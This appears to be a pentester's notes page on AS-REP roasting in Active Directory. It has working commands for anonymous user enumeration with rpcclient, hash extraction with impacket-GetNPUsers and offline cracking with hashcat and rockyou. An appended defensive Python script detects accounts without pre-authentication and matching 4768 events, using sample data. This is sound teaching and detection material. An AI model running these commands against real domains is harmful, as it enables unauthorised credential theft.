AS-REP Roasting

AS-REP roasting takes advantage of a known weakness in the Kerberos authentication protocol that can be exploited during initial authentication with a Key Distribution Center (KDC). When an account has the “Do not require Kerberos preauthentication” option enabled, the KDC answers an AS-REQ for that account without any proof of the password, and the returned AS-REP contains material encrypted with a key derived from the user's password. AS-REP roasting lets a malicious actor request that material for every such account and crack it offline to recover the password.

Get a list of AD usernames

Use ldapsearch, the NSE scripts for LDAP (see Active Directory), Enum4Linux, rpcclient (see the Samba page), etc.

rpcclient -N -U "" $IP
enumdomusers

Extract hashes for users that have the “Do not require Kerberos preauthentication” option enabled

See impacket-GetNPUsers.

impacket-GetNPUsers -no-pass -dc-ip $DC_IP $DOMAIN/ -usersfile users.txt -outputfile hashes.txt

💡 Seen in a demo.

impacket-GetNPUsers -request ${DOMAIN}/ -usersfile reproastable.txt -format hashcat

Crack hashes

See Hashcat.

HASH=hashes.txt
TYPE=18200
WL=/usr/share/wordlists/rockyou.txt
hashcat -O -m $TYPE -a 0 $HASH $WL
hashcat -O -m $TYPE -a 0 $HASH $WL --show
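Added defender-side check, not part of the original notes: the option abused above is the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl, and a KDC that issues a TGT without pre-authentication logs event 4768 with Pre-Authentication Type 0 (etype 0x17 is the RC4 format hashcat mode 18200 cracks). The script flags both on constructed sample data; the flattened key=value log layout is an assumption for illustration.

```python
# userAccountControl bit for "Do not require Kerberos preauthentication"
DONT_REQ_PREAUTH = 0x400000


def roastable_accounts(accounts):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.

    `accounts` is an iterable of (sAMAccountName, userAccountControl) pairs,
    e.g. the result of an LDAP query; the sample below is constructed.
    """
    return sorted(name for name, uac in accounts if uac & DONT_REQ_PREAUTH)


def parse_kv(line):
    """Parse a flattened 'Key=Value Key=Value' event line into a dict (assumed layout)."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def asrep_roast_alerts(log_lines):
    """Flag successful 4768 events (TGT issued) where no pre-authentication was used."""
    alerts = []
    for line in log_lines:
        ev = parse_kv(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue  # only successful TGT requests carry a usable AS-REP
        if ev.get("PreAuthType") != "0":
            continue  # PreAuthType 0 = logon without pre-authentication
        etype = ev.get("TicketEncryptionType", "").lower()
        alerts.append({
            "user": ev.get("TargetUserName"),
            "ip": ev.get("IpAddress"),
            "etype": etype,
            "rc4": etype == "0x17",  # RC4-HMAC, the crackable mode-18200 form
        })
    return alerts


# Constructed sample data (not real directory or log contents).
SAMPLE_ACCOUNTS = [
    ("alice", 0x200),                   # NORMAL_ACCOUNT
    ("svc_backup", 0x200 | 0x400000),   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    ("bob", 0x200 | 0x10000),           # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
]
SAMPLE_LOG = [
    "EventID=4768 TargetUserName=alice Status=0x0 TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=svc_backup Status=0x0 TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=svc_backup Status=0x0 ServiceName=cifs/fs01 TicketEncryptionType=0x17",
]

if __name__ == "__main__":
    print("accounts without preauth:", roastable_accounts(SAMPLE_ACCOUNTS))
    for alert in asrep_roast_alerts(SAMPLE_LOG):
        print("AS-REP issued without preauth:", alert)
```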